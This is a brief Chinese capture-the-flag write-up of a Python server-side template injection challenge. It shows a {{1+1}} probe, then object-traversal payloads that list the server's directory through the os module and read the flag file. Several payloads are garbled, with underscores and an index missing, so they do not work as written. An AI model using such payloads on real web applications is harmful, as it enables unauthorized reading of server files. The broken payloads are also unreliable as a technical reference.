攻防世界WEB高手進階之python_template_injection

打開網站是寫着以下 然後測試以下{{1+1}}被執行了 然後測試{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}發現有一個flag 使用{{’’.class.mro[2].subclasses()40.read()}}打開
相關文章
相關標籤/搜索